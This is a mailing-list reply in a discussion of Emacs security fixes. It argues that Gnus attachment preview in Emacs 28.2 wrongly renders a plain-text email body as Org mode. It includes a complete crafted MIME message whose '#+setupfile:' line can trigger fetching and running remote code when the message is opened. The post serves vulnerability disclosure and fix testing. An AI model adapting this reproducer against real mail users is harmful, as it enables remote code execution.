Re: Reproducers for recent Emacs security issues

[Max Nikulin <manikulin@gmail.com>]

On 16/04/2024 06:30, Andrew Cohen wrote:
>>>>>> "FW" == Florian Weimer writes:
>      FW> It's a feature.
[...]
> I stand corrected---this  still looks quite useful and seems to be
> working as intended.

I am not trying to dispute that attachment preview is a useful feature 
and it is nice to have syntax highlight. I still believe, its 
implementation is buggy and behavior may confuse those who test fixes 
for the recent security vulnerabilities.

Consider the following message:

---- 8< ----
To: A User <a.user@example.com>
From: Attacker <attacker@example.org>
Subject: Gnus inline attachment preview is buggy
Date: Mon, 15 Apr 2024 17:47:53 +0000
Message-ID: <123@example.org>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------si3r85hbIUHz9WH"

This is a multi-part message in MIME format.
--------------si3r85hbIUHz9WH
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* The *following* line should not affect attachment preview:
#+setupfile: http://localhost:8000/setup-1234567890.org
- =text/plain= body :: should not be fonified as an Org mode buffer.

--------------si3r85hbIUHz9WH
Content-Type: text/x-org; charset=UTF-8; name="test.org"
Content-Disposition: attachment; filename="test.org"

Nothing dangerous or suspicious here.
--------------si3r85hbIUHz9WH--
---- >8 ----

Message body should be presented as plain text and its content should 
not affect attachment and should not be interpreted as Org mode markup.

What I see in Emacs-28.2 is that text/plain message body is fontified as 
an Org mode buffer, even "#+setupfile:" is interpreted by Org mode code.

I do not mind that the attachment is invisible when I open the message.
What I really do not like is that some code is executed for invisible 
content. The attachment should be rendered when the user opens it, not 
when the message is opened.

In Emacs-28.2 a *folded* *attachment* may cause interpretation of 
"#+setupfile:" in the text/plain *body* as Org markup and may lead to 
execution of arbitrary code downloaded from a remote site immediately 
when user opens message without additional user actions.

 From my point of view, *risk* of an attack requiring opening an 
attachment is significantly lower than one when it is enough to just 
open mail message. I admit that *impact* measured using Common 
Vulnerability Scoring System (CVSS) v3.1 is the same. In both cases user 
action is required.